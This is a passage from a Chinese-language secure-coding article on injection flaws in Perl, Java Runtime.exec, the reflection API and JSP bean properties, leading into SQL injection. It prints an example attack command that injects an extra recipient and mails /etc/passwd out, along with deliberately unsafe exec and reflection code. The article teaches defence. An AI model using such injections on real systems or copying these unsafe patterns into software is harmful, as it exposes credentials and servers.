四、字符串解释执行
在有些编程语言中,输入字符串中可以插入特殊的函数,欺骗服务器使其执行额外的、多余的动作。下面的Perl代码就是一个例子:
$data = "mail body".
system("/usr/sbin/sendmail -t $1 < $data").
显然,这些代码可以作为CGI程序的一部分,或者也可以从命令行调用。通常,它可以
按照如下方式调用:
perl script.pl [email protected]
它将把一个邮件(即“mail body”)发送给用户[email protected]。这个例子虽然简单,但我们却可以按照如下方式进行攻击:
perl script.pl [email protected] [email protected] < /etc/passwd
这个命令把一个空白邮件发送给[email protected],同时又把系统密码文件发送给了
[email protected]。如果这些代码是CGI程序的一部分,它会给服务器的安全带来重大的威胁。
Perl程序员常常用外部程序(比如sendmail)扩充Perl的功能,以避免用脚本来实现外部程序的功能。然而,Java有着相当完善的API。比如对于邮件发送,JavaMail API就是一个很好的API。但是,如果你比较懒惰,想用外部的邮件发送程序发送邮件:
Runtime.getRuntime().exec("/usr/sbin/sendmail -t $retaddr < $data").
事实上这是行不通的。Java一般不允许把OS级“<”和“.”之类的构造符号作为
Runtime.exec()的一部分。你可能会尝试用下面的方法解决这个问题:
Runtime.getRuntime().exec("sh /usr/sbin/sendmail -t $retaddr < $data").
但是,这种代码是不安全的,它把前面Perl代码面临的危险带入了Java程序。按照常规的Java方法解决问题有时看起来要比取巧的方法复杂一点,但它几乎总是具有更好的可移植性、可扩展性,而且更安全、错误更少。Runtime.exec()只是该问题的一个简单例子,其他许多情形更复杂、更隐蔽。
让我们来考虑一下Java的映像 API(Reflection API)。Java映像API允许我们在运行时决定调用对象的哪一个方法。任何由用户输入命令作为映像查找条件的时机都可能成为系统的安全弱点。例如,下面的代码就有可能产生这类问题:
Method m = bean.getClass().getMethod(action, new Class[] {}).
m.invoke(bean, new Object[] {}).
如果“action”的值允许用户改变,这里就应该特别注意了。注意,这种现象可能会在一些令人奇怪的地方出现——或许最令人奇怪的地方就是JSP。大多数JSP引擎用映像API实现下面的功能:
这个Bean的set方法应该特别注意,因为所有这些方法都可以被远程用户调用。例如,对于Listing 3的Bean和Listing 4的JSP页面:
(Listing 3)
public class Example{
public void setName(String name) {
this.name = name. }
public String getName() { return name. }
public void setPassword(String pass) {
this. pass = pass. }
public String getPassword() { return
pass. }
private String name.
private String pass.
}
(Listing 4)
class="Example" />
从表面上看,这些代码只允许用户访问example Bean的名字。然而,了解该系统的用户可以访问“http://whereever.com/example.jsp?name=Fred&.password=hack”这种URL。这个URL既改变name属性,也改变password密码属性。当然,这应该不是页面编写者的意图,作者的意图是设计一个只允许用户访问名字属性的页面。因此,在使用时应该非常小心。字符串被解释执行的问题可能在允许嵌入脚本代码的任何环境中出现。例如,这类问题可能在Xalan(也称为LotusXSL)中出现,当然这是指系统设置不严格、易受攻击的情况下。
Xalan的脚本支持能够关闭(而且这是Xalan的默认设置),在敏感的应用中关闭脚本支持是一种明智的选择。当你需要用DOM处理XML文档时还必须考虑到另外一点:DOM保证所有文本都经过正确的转义处理,防止非法的标记插入到脚本之内。LotusXSL缺乏这个功能,但这绝不是一个BUG。支持脚本是LotusXSL的一个特色,而且它(明智地)默认处于关闭状态。XSL的W3C规范并没有规定支持脚本的能力。现在我们来看看字符串解释执行如何影响SQL和JDBC。假设我们要以用户名字和密码为条件搜索数据库中的用户,Listing 5的Servlet代码看起来不错,但事实上它却是危险的。